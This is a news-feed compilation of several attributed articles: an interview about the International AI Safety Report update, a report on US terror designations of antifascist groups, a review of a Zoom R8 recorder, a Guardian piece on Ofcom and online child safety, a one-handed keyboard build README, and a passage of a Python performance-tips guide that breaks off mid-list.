International AI Safety Report: A Conversation with Shalaleh Rismani of Mila - Quebec AI Institute

Internet Exchange
internet.exchangepoint.tech
2025-11-13 15:30:00
Inside the thinking behind the International AI Safety Report’s newest update on AI capabilities and risks....
Original Article
internet governance

Inside the thinking behind the International AI Safety Report’s newest update on AI capabilities and risks.

International AI Safety Report: A Conversation with Shalaleh Rismani of Mila - Quebec AI Institute
Photo by Claudio Schwarz / Unsplash

By Audrey Hingle in conversation with Shalaleh Rismani

The International AI Safety Report brings together research from experts around the world to provide a shared evidence base on the capabilities and risks of advanced AI systems. IX’s Mallory Knodel saw the main report presented at the United Nations General Assembly earlier this year, where it was introduced as part of an effort to inform global cooperation on AI governance.

To better understand the thinking behind the report and its recent update, I spoke with Shalaleh Rismani of Mila - Quebec AI Institute, one of the authors of the recent First Key Update. The update focuses on rapid advances in AI reasoning capabilities and examines how those developments intersect with emerging risks, including cybersecurity, biological threats, and impacts on labor markets. You can read both the report and the update at internationalaisafetyreport.org.

Why this report, and why now? What gap did the team hope to fill in the global AI safety conversation?

This is the second year the safety report has been produced as a collaborative project. The main report’s scope was set early by the lead writers and panelists, with input from experts around the world. The goal was to synthesize evidence on the most advanced AI systems, including technologies already being rolled out and others still in development, in a way that would be useful for policymakers.

As the field evolved, the team realized that one annual report was not enough to keep up with the pace of change. This year, the leadership decided to produce two interim updates in addition to the main report. The first, released in October, focused heavily on capabilities, particularly what researchers refer to as “reasoning capabilities.” These include systems that can generate multiple possible answers or ask clarifying questions before responding. The second update, coming at the end of November, will continue tracking those advances, while the next full report will be published in February.

The report cites thousands of studies. How did the team ensure that this huge body of research remains usable for policymakers and practitioners?

The main goal is to bring in as much evidence from the academic literature as possible and make it accessible to policymakers and the public. Each section is led by researchers embedded in the literature, and multiple rounds of revisions happen with expert reviewers.

Every citation goes through a vetting process to confirm that it comes from credible academic sources. Because AI research moves so fast, much of the work is pre-published, which makes it harder to assess. Still, the idea is to present the full range of research and show both where strong evidence exists and where gaps remain.

Publishing is one thing, but ensuring impact is another. How does the team think about getting the report in front of key audiences?

The dissemination strategy is a collaborative effort between the Chair, the writing team and the secretariat. The team participates in many briefings with governments and policymakers around the world. For example, we engaged directly with policymakers on the findings of the first key update, including from the EU, India, UK, Canada, Singapore, UAE, Australia, Japan, Kenya and others. Because panelists, senior advisers, and reviewers come from different countries, there is already strong buy-in. Civil society, academia, and major technology companies are also involved in the process, which helps expand the report’s reach.

How did the team integrate human rights considerations into what is otherwise a very technical safety framework?

Human rights are not presented as a standalone section, but they are integrated throughout the report. One way is by identifying where evidence exists and where it does not, which highlights gaps relevant to fairness, privacy, and equity. Many evaluations measure performance on benchmarks but not real-world outcomes. Pointing out those gaps helps guide future human rights work by showing where contextual studies are needed.

Some of the risks discussed in this update also touch directly on human rights. For example, the growing adoption of AI companionship technologies raises concerns about loneliness and emotional well-being. The report also notes early evidence of labor market impacts, particularly in software engineering, although broader economic effects are still unclear.

The report came out of a large international process. What did that collaboration reveal about where consensus exists and where it still breaks down when it comes to defining and governing AI safety?

There is broad agreement that AI systems are improving on certain benchmarks, but less consensus on whether those benchmarks accurately measure complex abilities like reasoning. Some experts question whether the current evaluation frameworks are valid for assessing reasoning at all.

There is also consensus that potential risks should be monitored proactively rather than ignored, though there is debate about which risks are most pressing. Monitoring and controllability risks, for instance, are still contested. Some lab studies suggest models underperform when they know they are being evaluated, while others do not show this effect. In contrast, there is stronger agreement around risks such as AI companionship, labor market disruption, and cyber offense and defense.

The report brings together such a wide range of evidence and perspectives. How do you think about assessing risk and avoiding overhyping progress?

The report does not use a specific framework to assess risk. There are frameworks being proposed for evaluating AI systems, and we report on developments in those frameworks rather than applying one ourselves.

We also recognize the risk of overhyping AI progress, especially right now. To address this, we try to look for real-world evidence of both improvements and shortcomings. The review processes and the involvement of stakeholders are other ways this is managed, and they help keep the report balanced.

If you had to highlight one or two takeaways that you hope will shape AI policy or practice in 2026, what would they be?

There is a significant gap in evaluating real-world impacts. Policymakers need a clearer understanding of how AI systems affect work, research, and society, not just benchmark scores. Creating infrastructure to support independent evaluations and audits will be key, whether through third-party organizations or public feedback mechanisms.

The second update, coming later this year, will focus on risk management practices and the solutions being proposed to address these risks. The goal is to show that progress is happening while recognizing that there is still much more work to do.


IX at MozFest

We’re back from our recent session at MozFest and buzzing with excitement from all of the ideas and connections we made. The room was packed for our session, Encryption and Feminism: Reimagining Child Safety Without Surveillance, and the conversation went far beyond the usual encryption talking points. Participants pushed into the real tensions between safety and care, shared lived experiences of how surveillance harms survivors and marginalised communities, and offered concrete ideas for what genuinely feminist approaches to child safety could look like.

We’re now working through the feedback forms and pulling those insights into a draft set of feminist principles for encryption. We’re also exploring an online rerun so more people can join the discussion and contribute, since not everyone interested could make it to MozFest, and even there the room couldn’t fit everyone who wanted to attend. So stay tuned!

Support the Internet Exchange

If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip.

Become A Paid Subscriber


From the Group Chat 👥 💬

This week in our Signal community, we got talking about:

IX contributor Heather Burns blew up Hacker News and even got a shout-out in the Financial Times for her viral blog post “Time to start de-Appling,” which warns UK users to migrate their data off iCloud after Apple announced it will disable Advanced Data Protection under the Investigatory Powers Act. Heather argues the move exposes how post-Brexit tech policy is eroding privacy rights. The post comes hot on the heels of our MozFest session on encryption and feminism, where we explored similar themes: governments invoke “child safety” to justify weakening encryption, sometimes at the expense of the very people it protects.


Internet Governance

Digital Rights

Technology for Society

Privacy and Security

Upcoming Events

Careers and Funding Opportunities

United States

Global

Opportunities to Get Involved

What did we miss? Please send us a reply or write to editor@exchangepoint.tech.

Marco Rubio Wants to Imprison You on Terror Charges for Supporting Nazi Punchers

Intercept
theintercept.com
2025-11-15 11:00:00
The Trump administration moved to designate antifa groups abroad as foreign terrorists — setting up the prosecution of their U.S. allies. The post Marco Rubio Wants to Imprison You on Terror Charges for Supporting Nazi Punchers appeared first on The Intercept....
Original Article

Hungarian Prime Minister Viktor Orbán’s government launched a continentwide manhunt when a group of European antifascists attacked a neo-Nazi rally three years ago.

Orbán, though, showed no such appetite for cracking down on the annual fascist rally, which this February drew attendees sporting SS patches, swastikas, and the “Totenkopf” death’s head symbol — all under the watchful eye of Hungarian police.

The aggressive response to antifascist activists, compared to the kid-gloves treatment of neo-Nazi demonstrators, has roiled European politics for years.

On Thursday, Secretary of State Marco Rubio joined the fray, inserting the U.S. into the debate by declaring the antifascist group that attacked the 2023 rally a terrorist organization.

Though the designation is aimed at foreign groups, Rubio said that he was acting in accordance with President Donald Trump’s National Security Presidential Memorandum-7, or NSPM-7, regarding purported “domestic” terrorists.

The terror designation will cut off the small Antifa Ost group, and three others designated by Rubio on Thursday, from raising funds in the U.S. It could also imperil American antifascist groups with civil and criminal allegations of “material support” for terrorism, a civil rights lawyer warned.

“The clever way to go about it for them is to designate some foreign organization, because a foreign organization can be designated and there is almost no due process,” said Shane Kadidal, a lawyer at the Center for Constitutional Rights. “Then, you go after the U.S. groups for supposedly coordinating their political messages with the messages of the foreign groups.”

Rubio’s announcement follows on the heels of one from Trump in September that he was designating antifa a “major terrorist organization,” which has no basis in law. The foreign terrorist organization designations, however, entail significant legal consequences.

Under a 2010 ruling from the Supreme Court, domestic groups can face “material support” charges for providing nonviolent support to designated foreign terrorist organizations.

Kadidal said the Trump administration could essentially try to use the foreign terrorist designations as a workaround to target domestic antifascists with “material support” charges. Key questions such as whether domestic activists had knowledge and intent to coordinate with foreign groups can be left for a jury to decide based on circumstantial evidence, he said.

“That is one of those things that makes this so dangerous,” he said. “The jury may just decide, ‘Yeah, whatever you have alleged about this coordination of messaging is true, because these are bad people in front of me.’”

“Juries do this thing all the time. They jump to conclusions.”

Thousands of neo-Nazis gathered in Budapest for the annual so-called Day of Honour march, an event that openly glorifies those who fought alongside the Nazis.

Participants displayed Nazi insignia, uniforms, and slogans, with known extremists from across Europe joining the rally.… pic.twitter.com/ZUY1a9eS9J

— European Jewish Congress (@eurojewcong) February 10, 2025

Street Brawlers

The antifascists who targeted the neo-Nazi “Day of Honor” rally held in Budapest in February 2023 are accused of beating and bloodying several people, some of whom may have been victims of mistaken identity, according to Hungarian authorities.

Even leftists who disapprove of street violence, however, were outraged by what happened next. Orbán’s government relentlessly sought the extradition of alleged participants in the antifascist action and pressed for long prison terms.

In the years since, neo-Nazis have continued to gather in Budapest under the protection of Hungarian police, in sharp contrast to the country’s ban on pride parades. Antifa Ost’s alleged members, meanwhile, have faced trials in Germany and Hungary, where one faces up to 23 years in prison.

In addition to Antifa Ost, Rubio designated three other groups as terrorists: the Informal Anarchist Federation/International Revolutionary Front of Italy; and in Greece, the groups Armed Proletarian Justice and Revolutionary Class Self-Defense.

The groups’ actions — ranging from the bombing of a Greek train office to the non-fatal shooting of a nuclear company’s executive — have drawn little notice in the U.S., but the State Department cast them in dramatic terms in a social media post.

“Anarchist militants have waged terror campaigns in the United States and Europe, conspiring to undermine the foundations of Western Civilization through their brutal attacks,” the department said.

Rubio promised more crackdowns to come.

“The United States will continue using all available tools to protect our national security and public safety,” he said in a statement, “and will deny funding and resources to terrorists, including targeting other Antifa groups across the globe.”

Trump’s Hungarian Pals

Despite lacking a basis in law, Trump’s domestic terror label for antifascists has already had real-world effects.

Last month, the International Anti-Fascist Defence Fund, a group that has supported antifascists in the U.S., announced that it was shutting down its fundraising channels as a “precaution” in response to Trump’s “edict.” The group has raised money for antifascists in the U.S. and abroad, including the counter-protesters in Budapest.

“We are presently exploring our options for re-establishing the Defence Fund’s infrastructure in a country not currently governed by fascists and we hope to have good news about that shortly,” the group said.

When it comes to the designations Rubio issued this week, meanwhile, the administration could face complications in wielding them directly against activists. Prosecutors would still have to convince judges and juries to secure criminal convictions against domestic activists.

The designations from Rubio, however, could also open the floodgates for private actors who could file civil lawsuits on even flimsier grounds.

Rubio designated the antifascist groups as both specially designated global terrorists and foreign terrorist organizations. The latter designation, which goes into effect November 20, opens domestic groups to civil liability for allegedly providing material support.

The same legal theory has been used by pro-Israel law firms to harass pro-Palestine student protesters. Even if the cases are eventually thrown out, they can smother activists in costly court proceedings for years, Kadidal said.

“What the government can do is already really, really broad and concerning,” he said. “What they can unleash private actors to do without any accountability is a whole ’nother bag of tricks.”

ucs-detect: automatically test the Unicode version and support level of a terminal emulator

Lobsters
ucs-detect.readthedocs.io
2025-11-15 10:39:54
Comments...

Jonathan Dowland: Zoom R8

PlanetDebian
jmtd.net
2025-11-15 10:14:34
When I started looking at synths again, I had a feeling I would want to record from them, and ideally not with a computer. To that end, I also bought a second-hand standalone multitrack recorder, the Zoom R8. It's a little desktop console with two inputs, a built-in mic, and 8 sliders for ...
Original Article

When I started looking at synths again, I had a feeling I would want to record from them, and ideally not with a computer. To that end, I also bought a second-hand standalone multitrack recorder, the Zoom R8.

It's a little desktop console with two inputs, a built-in mic, and 8 sliders for adjusting the playback of 8 (ostensibly) independent tracks. It has a USB port to interface with a computer, and features some onboard effects (delay, reverb, that kind-of thing).

Look a bit closer, and the USB port is mini-USB, which gives away its age (and I'll never get rid of mini-USB cables, will I?). The two inputs are mono, so to capture stereo output from the minilogue-xd I need to tie up both inputs. Also, the 8 tracks are mono, so it's more like a stereo 4-track.

The effects (what little I've played with them) are really pretty cool, and it's great to apply them to a live signal. We had some fun running them over a bass guitar. However, you can only use them at the 44.1 kHz sample rate; if you forgo the effects, the device supports 48 kHz.

I've ended up using it as my main USB interface on my computer; it's great for that. The internal mic ended up being too weak to use for video calls. As a USB interface, my computer can receive the signal from the synth (and I've wasted more time than I care to admit trying to wrestle with the Linux audio stack to do something with that).

It can also run on batteries, which opens up the possibility of recording piano with my daughter, or field recording or suchlike.

Writing this up serves as a reminder to me of why I bought it, and I now intend to spend a little more time using it that way and stop wasting time fighting ALSA/PulseAudio/PipeWire/PortAudio/etc.

Father of teen whose death was linked to social media has ‘lost faith’ in Ofcom

Guardian
www.theguardian.com
2025-11-15 10:00:07
Ian Russell says watchdog lacks ‘urgency’ and is not willing to use its powers ‘to the extent required’ The father of Molly Russell, a British teenager who killed herself after viewing harmful online content, has called for a change in leadership at the UK’s communications watchdog after losing fai...
Original Article

The father of Molly Russell, a British teenager who killed herself after viewing harmful online content, has called for a change in leadership at the UK’s communications watchdog after losing faith in its ability to make the internet safer for children.

Ian Russell, whose 14-year-old daughter took her own life in 2017, said Ofcom had “repeatedly” demonstrated that it does not grasp the urgency of keeping under-18s safe online and was failing to implement new digital laws forcefully.

“I’ve lost confidence in the current leadership at Ofcom,” he told the Guardian. “They have repeatedly demonstrated that they don’t grasp the urgency of this task and they have shown that they don’t seem to be willing to use their powers to the extent that is required.”

Russell’s comments came in the same week the technology secretary, Liz Kendall, wrote to Ofcom saying she was “deeply concerned” about delays in rolling out parts of the Online Safety Act (OSA), a landmark piece of legislation laying down safety rules for social media, search and video platforms.

Russell, who has become an influential internet safety campaigner since his daughter’s death, said that last year he raised concerns with Ofcom’s chief executive, Melanie Dawes, about an online suicide forum accessible to UK users.

Ofcom opened an investigation into the site this year, shortly after assuming new regulatory powers from the OSA, and the forum voluntarily geo-blocked access to UK users.

But Russell said the investigation appeared to have “stalled” before the regulator ramped up its probe this month – when it emerged the forum was still available to UK users through a previously undetected “mirror site”.

Molly Russell died in 2017. Photograph: PA

“If Ofcom can’t deal with something as black and white, cut and dried as that, you have to question what else they can deal with,” Russell said.

Ofcom addressed Russell’s concerns in a letter, saying that the site’s geo-block had been constantly monitored, but the mirror site – operating under a wholly different domain name – had come to the regulator’s attention only this month.

Russell said he shared Kendall’s disappointment in delays to implementing further elements of the OSA, including strict rules for the largest and most influential online platforms. Ofcom has said the delays were due to a court challenge from the Wikimedia Foundation – the charity behind Wikipedia.

The watchdog said it had the “highest respect” for bereaved families and pointed to achievements under its watch, such as age checks for pornography sites and a crackdown on child sexual abuse material.

“We are working with urgency to drive tech firms to deliver a safer life online for children and adults in the UK, and while the job is not done, change is happening,” a spokesperson said.

The Molly Rose Foundation, a charity founded by Molly’s family, has submitted a letter to the UK government calling on ministers to extend a legal requirement for transparency from public officials to apply to tech companies as well.

The letter urged Alex Davies-Jones, the victims minister, to expand the remit of the public authority (accountability) bill, which introduces a “duty of candour” for public officials.

The bill, brought in after criticism of how police officers presented evidence at the Hillsborough inquiry, requires public bodies and officials to help investigations – including coroner’s courts – by providing information and evidence proactively, without favouring their own position.

The foundation believes that requiring companies regulated by the OSA to abide by the same rules would prevent them from dragging their heels over submitting evidence in the case of a death where social media use was potentially involved.

The inquest into Molly’s death was subject to delays owing to wrangles with Meta over submitting evidence.

The letter said: “This shift would fundamentally reset the relationship between tech companies and their victims – a move that would require tech companies to act transparently and expeditiously when responding to legal requests.”

Recent legislation has bolstered coroners’ powers, enabling them to demand evidence of social media use from tech companies under the OSA and prevent important data from being deleted, but the letter’s signatories believe tougher powers are needed.

Among more than 40 signatories were members of the group Bereaved Families for Online Safety and the Meta whistleblower Arturo Béjar.

A government spokesperson pointed to the legal changes enhancing coroners’ powers to require information from tech firms.

“The Online Safety Act supports coroners conducting inquests and families seeking the truth in compelling companies to share data fully where there is evidence of a link between a child’s death and their social media use,” said the spokesperson.

“As promised in our manifesto, we have also strengthened this by also giving coroners the power to request that data is preserved to support inquests. We will not hesitate to act, and will work with families and campaigners to ensure we protect families and children.”

One Handed Keyboard

Hacker News
github.com
2025-11-15 09:44:15
Comments...
Original Article

One-Handed Keyboard

We received a special email. The sender's daughter was run over by a heavy truck on her way to school and permanently lost the use of her right hand. When using a computer she has to switch constantly between the keyboard and the mouse, which makes typing slow and tiring. He asked us to help build a one-handed keyboard for his daughter.

Left-hand small keyboard

Left-hand large keyboard

This is a single-mode (wired-only) mechanical keyboard with an integrated trackball. The firmware is based on QMK; thanks to all the developers who have contributed to the QMK community.

Build reference (video): 【何同学】我们做了个特别的键盘… ("We made a special keyboard…")

Open-source hardware: HTXStudio one-handed keyboard

GitHub repository

Gitee repository

For the development environment and setup, see here; the firmware source code is here.

This repository includes:

  • Eight PCBs covering three keyboard models (left- and right-hand), provided as LCEDA (立创EDA) projects.
  • VIA key-remapping configuration files, plus compiled firmware.
  • Model design files.

Repository structure

Docs

Chip datasheets and images.

Firmware

QMK firmware for the three keyboard models, plus the JSON files used for remapping keys with VIA.

Hardware

JLC EDA (LCEDA) project files.

Model

Model files and fabrication files used for each keyboard model.


Build guide

PCB:

1-Right-hand keyboard, hot-swap (large): FR-4, 1.6 mm thick, 4-layer board, stackup JLC04161H-3313, impedance control +/-20%.

1-Left-hand keyboard, soldered (small): FR-4, 1.6 mm thick, 2-layer board; the ALPS yellow switches need a little extra force to seat fully.

1-Left-hand keyboard, hot-swap (large): FR-4, 1.6 mm thick, 4-layer board, stackup JLC04161H-3313, impedance control +/-20%.

2-TypeC: FR-4, 1.6 mm thick, 2-layer board, labeled CON1 (large keyboards only).

3-Trackball: FR-4, 1.6 mm thick, 2-layer board; mind the soldering orientation of the module, labeled CON3.

4-Mouse wheel: FR-4, 1.6 mm thick, 2-layer board; a 7 mm-tall encoder and 6 mm-tall switches with an actuation force of ≤180 g are recommended, labeled CON2.

5-Arrow keys: FR-4, 1.6 mm thick, 2-layer board; the ALPS yellow switches need a little extra force to seat fully, labeled CON4.

6-Controller board, left-hand (small): FR-4, 1.6 mm thick, 2-layer board.

  • 3-Trackball, 4-Mouse wheel and 5-Arrow keys are small control boards shared across the keyboards.
  • 5-Arrow keys and 1-Left-hand keyboard, soldered (small) use ALPS yellow switches.
  • Note that the left- and right-hand large keyboards are not exact mirror images.
  • The trackball is driven over the SPI1 channel and the scroll wheel has two dedicated signal lines, so other pointing devices can be swapped in without major changes.
  • The MCU is an STM32G431CBU6.
  • Compatible with A-to-C or C-to-C data cables.

3D-printed parts:

Keycaps: resin, PLA, etc.

Trackball housing: resin, PLA, etc.

Left/right mouse buttons: resin, PLA, etc.

Case: resin, PLA, etc.

Base: resin, PLA, etc.

Fabricated parts:

Plate: POM recommended, 1.5 mm thick.

Plate foam strips: adhesive on one side only.

Sandwich (plate) foam: Poron recommended, 3.5 mm thick.

Switch pad foam: 2 mm thick.

Bottom foam: Poron recommended, 4 mm thick.

Silicone pad (small keyboard only): 5 mm thick, hardness Shore 00-10.

Fasteners:

Part                           Large keyboard (pcs)   Small keyboard (pcs)
M3×3×4 heat-set brass insert   8                      8
M2×2×3 heat-set brass insert   2                      -
M2×3×3 heat-set brass insert   17                     12
M3×6 countersunk screw         2                      6
M3×15 countersunk screw        -                      4
M3×22 countersunk screw        6                      -
M2×8 cap-head screw            4                      4
M2×3 cap-head screw            2                      -
M2×5 cap-head screw            13                     8
M3×16 pan-head screw           -                      2

Other parts:

Trackball: 25mm diameter, PTFE.

Bearing balls: 2mm diameter, PTFE, 6 pcs, installed in the printed trackball housing.

Scroll wheel: recommended 19mm-20mm diameter, 4mm-5mm thick, metal.

Stabilizers: 2U plate-mount stabilizers.

Switches: 57 ultra-small ALPS yellow switches for the small keyboard; 57 common mechanical switches for the large keyboard.

FPC ribbon cables: 0.5mm pitch, 8-pin, reversed; two 10cm and two 15cm.

  • The FPC connectors on the controller board and the small boards are all labeled CON; connect matching labels to each other.
  • The boards use FPC sockets that can take the cable contacts on either side; note that when both sockets take bottom contacts, a reversed ribbon cable must be used.

Model structure:

Exploded view of the left-hand small keyboard

Exploded view of the left-hand large keyboard

Assembly order:

Using the large keyboard as an example.

Preparation before assembly

  • First connect the 4 small PCBs to the main keyboard PCB with the ribbon cables and flash the firmware.
  • Fit 3-5 switches, the scroll wheel and the trackball, and make sure everything works before assembly.
  • Install the correct heat-set brass inserts at the matching positions on the printed case and base.
  • Print the keycap legends.
  • Stick the foam strips onto the protruding parts of the plate (both front and back).

For the first firmware flash, hold down the button labeled "B" on the back of the PCB, then plug in the USB cable and flash the firmware.

To update the firmware later, hold down the "ESC" key on the keyboard, then plug in the USB cable and flash.

For more details, see Flashing Your Keyboard (QMK)

Now for the assembly

  1. Screw the 4 small boards into their positions on the base (mind the ribbon cables and the orientation); the trackball housing is screwed in from underneath.
  2. Screw the left and right mouse buttons onto the keyboard PCB.
  3. From bottom to top, place the bottom foam, switch pad foam, keyboard PCB, sandwich foam and plate into the fan-shaped area of the base.
  4. Insert the switches.
  5. Fit the case and secure it with screws from underneath.
  6. Install the keycaps to finish the assembly.

For a guide to installing the screws and heat-set inserts, see here

Finally, this is our first open-source project; if anything falls short, feedback and corrections are welcome. Thank you all.


References

Quantum Mechanical Keyboard Firmware

mrjohnk. ADNS-9800. GitHub repository

10 patterns for faster python code

Lobsters
blog.jetbrains.com
2025-11-15 09:28:38
Comments...
Original Article

10 Smart Performance Hacks For Faster Python Code

This is a guest post from Dido Grigorov, a deep learning engineer and Python programmer with 17 years of experience in the field.

In the rapidly evolving domain of software development, Python has established itself as a premier language, renowned for its simplicity, readability, and versatility. It underpins a vast range of applications, from web development to artificial intelligence and data engineering. However, beneath its elegant syntax lies a potential challenge: performance bottlenecks that can transform otherwise efficient scripts into noticeably sluggish processes.

Whether the task involves processing large datasets, developing real-time systems, or refining computational efficiency, optimizing Python code for speed can be a decisive factor in achieving superior results.

This guide presents 10 rigorously tested performance-enhancement strategies. Drawing upon Python’s built-in capabilities, efficient data structures, and low-level optimization techniques, it offers practical methods to accelerate code execution without compromising the language’s characteristic clarity and elegance. Supported by empirical benchmarks and illustrative code examples, these techniques demonstrate how incremental improvements can yield substantial performance gains – empowering developers to transition from proficient practitioners to true experts in high-performance Python programming.

Let’s dive in and turbocharge your Python prowess!

Hack 1: Leverage sets for membership testing

When you need to check whether an element exists within a collection, using a list can be inefficient – especially as the size of the list grows. Membership testing with a list ( x in some_list ) requires scanning each element one by one, resulting in linear time complexity ( O(n) ):

import time

big_list = list(range(1000000))
big_set = set(big_list)

start = time.time()
print(999999 in big_list)
print(f"List lookup: {time.time() - start:.6f}s")

start = time.time()
print(999999 in big_set)
print(f"Set lookup: {time.time() - start:.6f}s")

Time measured:

  • List lookup: ~0.015000s
  • Set lookup: ~0.000020s

In contrast, sets in Python are implemented as hash tables, which allow for constant-time ( O(1) ) lookups on average. This means that checking whether a value exists in a set is significantly faster, especially when dealing with large datasets.

For tasks like filtering duplicates, validating input, or cross-referencing elements between collections, sets are far more efficient than lists. They not only speed up membership tests but also make operations like unions, intersections, and differences much faster and more concise.

By switching from lists to sets for membership checks – particularly in performance-critical code – you can achieve meaningful speed gains with minimal changes to your logic.
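
Beyond membership tests, the same structure pays off for the unions, intersections, and differences mentioned above. Here is a minimal sketch (not from the original article, with made-up data) illustrating those operations:

emails_today = {"a@example.org", "b@example.org", "c@example.org"}
emails_yesterday = {"b@example.org", "c@example.org", "d@example.org"}

both_days = emails_today & emails_yesterday   # intersection
either_day = emails_today | emails_yesterday  # union
new_today = emails_today - emails_yesterday   # difference

# De-duplicating a list while keeping average O(1) membership checks:
unique = set(["b@example.org", "b@example.org", "a@example.org"])
print(both_days, either_day, new_today, unique)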

Hack 2: Avoid unnecessary copies

Copying large objects like lists, dictionaries, or arrays can be costly in both time and memory. Each copy creates a new object in memory, which can lead to significant overhead, especially when working with large datasets or within tight loops.

Whenever possible, modify objects in place instead of creating duplicates. This reduces memory usage and improves performance by avoiding the overhead of allocating and populating new structures. Many built-in data structures in Python provide in-place methods (e.g. sort , append , update ) that eliminate the need for copies.

numbers = list(range(1000000))
def modify_list(lst):
    lst[0] = 999
    return lst
start = time.time()
result = modify_list(numbers)
print(f"In-place: {time.time() - start:.4f}s")

def copy_list(lst):
    new_lst = lst.copy()
    new_lst[0] = 999
    return new_lst
start = time.time()
result = copy_list(numbers)
print(f"Copy: {time.time() - start:.4f}s")

Time measured:

  • In-place: ~0.0001s
  • Copy: ~0.0100s

In performance-critical code, being mindful of when and how objects are duplicated can make a noticeable difference. By working with references and in-place operations, you can write more efficient and memory-friendly code, particularly when handling large or complex data structures.

Hack 3: Use __slots__ for memory efficiency

By default, Python classes store instance attributes in a dynamic dictionary ( __dict__ ), which offers flexibility but comes with memory overhead and slightly slower attribute access.

Using __slots__ allows you to explicitly declare a fixed set of attributes for a class. This eliminates the need for a __dict__ , reducing memory usage – which is especially beneficial when creating many instances of a class. It also leads to marginally faster attribute access due to the simplified internal structure.

While __slots__ does restrict dynamic attribute assignment, this trade-off is often worthwhile in memory-constrained environments or performance-sensitive applications. For lightweight classes or data containers, applying __slots__ is a simple way to make your code more efficient.

class Point:
    __slots__ = ('x', 'y')
    def __init__(self, x, y):
        self.x = x
        self.y = y
start = time.time()
points = [Point(i, i+1) for i in range(1000000)]
print(f"With slots: {time.time() - start:.4f}s")

Time measured:

  • With __slots__ : ~0.1200s
  • Without __slots__ : ~0.1500s
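
The article times both variants but only shows the __slots__ version; for reference, a minimal sketch of what the plain-class baseline behind the second timing presumably looks like:

import time

# Regular class: attributes live in a per-instance __dict__.
class PointDict:
    def __init__(self, x, y):
        self.x = x
        self.y = y

start = time.time()
points = [PointDict(i, i + 1) for i in range(1000000)]
print(f"Without slots: {time.time() - start:.4f}s")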

Hack 4: Use math functions instead of operators

For numerical computations, Python’s math module provides functions that are implemented in C, offering better performance and precision than equivalent operations written in pure Python.

For example, using math.sqrt() is typically faster and more accurate than raising a number to the power of 0.5 using the exponentiation ( ** ) operator. Similarly, functions like math.sin() , math.exp() , and math.log() are highly optimized for speed and reliability.

These performance benefits become especially noticeable in tight loops or large-scale calculations. By relying on the math module for heavy numerical work, you can achieve both faster execution and more consistent results – making it the preferred choice for scientific computing, simulations, or any math-heavy code.

Use math functions instead of operators

PyCharm makes it even easier to take advantage of the math module by providing intelligent code completion. Simply typing math. triggers a dropdown list of all available mathematical functions and constants – such as sqrt() , sin() , cos() , log() , pi , and many more – along with inline documentation.

This not only speeds up development by reducing the need to memorize function names, but also encourages the use of optimized, built-in implementations over custom or operator-based alternatives. By leveraging these hints, developers can quickly explore the full breadth of the module and write cleaner, faster numerical code with confidence.

import math
numbers = list(range(10000000))
start = time.time()
roots = [math.sqrt(n) for n in numbers]
print(f"Math sqrt: {time.time() - start:.4f}s")

start = time.time()
roots = [n ** 0.5 for n in numbers]
print(f"Operator: {time.time() - start:.4f}s")

Time measured:

  • math.sqrt : ~0.2000s
  • Operator: ~0.2500s

Hack 5: Pre-allocate memory with known sizes

When building lists or arrays dynamically, Python resizes them in the background as they grow. While convenient, this resizing involves memory allocation and data copying, which adds overhead – especially in large or performance-critical loops.

If you know the final size of your data structure in advance, pre-allocating memory can significantly improve performance. By initializing a list or array with a fixed size, you avoid repeated resizing and allow Python (or libraries like NumPy) to manage memory more efficiently.

This technique is particularly valuable in numerical computations, simulations, and large-scale data processing, where even small optimizations can add up. Pre-allocation helps reduce fragmentation, improves cache locality, and ensures more predictable performance.

start = time.time()
result = [0] * 1000000
for i in range(1000000):
    result[i] = i
print(f"Pre-allocated: {time.time() - start:.4f}s")

start = time.time()
result = []
for i in range(1000000):
    result.append(i)
print(f"Dynamic: {time.time() - start:.4f}s")

Time measured:

  • Pre-allocated: ~0.0300s
  • Dynamic: ~0.0400s
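
Since the section also mentions NumPy, here is a minimal sketch (assuming NumPy is installed; not part of the original benchmark) of the same idea with a pre-allocated array, plus the vectorized construction you would normally prefer:

import time
import numpy as np

n = 1_000_000

# Pre-allocate a fixed-size array and fill it in place.
start = time.time()
arr = np.zeros(n, dtype=np.int64)
for i in range(n):
    arr[i] = i
print(f"NumPy pre-allocated: {time.time() - start:.4f}s")

# Vectorized construction avoids the Python-level loop entirely.
start = time.time()
arr = np.arange(n, dtype=np.int64)
print(f"NumPy arange: {time.time() - start:.4f}s")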

Hack 6: Avoid exception handling in hot loops

While Python’s exception handling is powerful and clean for managing unexpected behavior, it’s not designed for high-frequency use inside performance-critical loops. Raising and catching exceptions involves stack unwinding and context switching, which are relatively expensive operations.

In hot loops – sections of code that run repeatedly or process large volumes of data – using exceptions for control flow can significantly degrade performance. Instead, use conditional checks ( if , in , is , etc.) to prevent errors before they occur. This proactive approach is much faster and leads to more predictable execution.

Reserving exceptions for truly exceptional cases, rather than expected control flow, results in cleaner and faster code – especially in tight loops or real-time applications where performance matters.

numbers = list(range(10000000))
start = time.time()
total = 0
for i in numbers:
    if i % 2 != 0:  # check before dividing instead of catching the exception
        total += i / (i % 2)
    else:
        total += i
print(f"Conditional: {time.time() - start:.4f}s")

start = time.time()
total = 0
for i in numbers:
    try:
        total += i / (i % 2)
    except ZeroDivisionError:
        total += i
print(f"Exception: {time.time() - start:.4f}s")

Time measured:

  • Conditional: ~0.3000s
  • Exception: ~0.6000s

Hack 7: Use local functions for repeated logic

When a specific piece of logic is used repeatedly within a function, defining it as a local (nested) function – also known as a closure – can improve performance and organization. Local functions benefit from faster name resolution because Python looks up variables more quickly in local scopes than in global ones.

In addition to the performance gain, local functions help encapsulate logic, making your code cleaner and more modular. They can also capture variables from the enclosing scope, allowing you to write more flexible and reusable inner logic without passing extra arguments.

This technique is particularly useful in functions that apply the same operation multiple times, such as loops, data transformations, or recursive processes. By keeping frequently used logic local, you reduce both runtime overhead and cognitive load.

Hint: Use AI Assistant’s Suggest Refactoring

If you’re using PyCharm (or any JetBrains product) with the AI Assistant plugin, one particularly powerful tool is Suggest Refactoring. With it, you can select a segment of code, invoke the AI Assistant, and ask it to propose cleaner or more efficient alternatives – all in one go.

The assistant shows you a “refactored” version of your code, lets you view the diff (what would change), and you can accept either selected snippets or the whole block. This helps maintain consistency, enforce best practices, and catch opportunities for improvement you might otherwise miss.

AI Assistant’s Suggest Refactoring

How to use Suggest Refactoring

Here are step-by-step instructions (as per JetBrains’ documentation) on how to use this feature:

  1. Select the code fragment you want to refactor.
  2. When the popup appears (e.g. small lightbulb or context menu), click the AI Assistant icon.
